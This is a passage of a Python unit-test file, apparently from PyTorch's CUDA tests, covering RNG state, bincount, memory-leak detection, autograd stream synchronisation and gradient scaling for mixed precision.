self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would cause overflow to negative value
# giving negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses if proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEquals below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
